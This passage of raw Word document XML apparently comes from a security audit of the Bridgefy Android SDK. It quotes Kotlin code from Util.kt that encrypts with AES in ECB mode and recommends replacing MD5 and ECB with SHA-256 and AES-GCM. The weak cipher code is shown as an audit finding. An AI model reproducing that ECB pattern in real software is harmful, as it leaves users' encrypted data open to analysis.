          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>not 32 chars")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1496" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cipher.getInstance(ALGORITHM_STR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1496" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SecretKeySpec(getKey(secretKey),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ALGORITHM) c.init(opmode, sk)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1496" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-crypto/src/main/java/me/bridgefy/crypto/utils/Util.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="1100" w:right="2862" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ByteArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ByteArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ByteArray?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1496" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cipher = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cipher.getInstance(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AES/ECB/PKCS7Padding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1496" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>secretKeySpec = SecretKeySpec(key, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"AES"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1496" w:right="3392" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cipher.init(Cipher.ENCRYPT_MODE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>secretKeySpec) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cipher.doFinal(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1100" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(e: Exception) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1496" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Log.e(TAG, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Error to encrypt: " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>e.message)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1100" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1100" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AES/ECB/PKCS7Padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>adequate replacement without cryptographic weaknesses (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AES/GCM/ NoPadding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in respective order). Please note that the CBC modes of encryption should also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be avoided. The reason for this is that implementations using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Cipher Mode Chaining </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>mode (CBC) may be vulnerable to padding oracle attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487615488">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193163</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="78" name="Graphic 78"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="78" name="Graphic 78"/>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5.209692pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15700992;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape63" coordorigin="1440,304" coordsize="2880,0" path="m1440,304l4320,304e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId174">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Secure_Hash_Algorithms</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="62"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId175">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://users.ece.cmu.edu/~dbrumley/courses/18487-f13/powerpoint/19-mobile-security.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId176">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
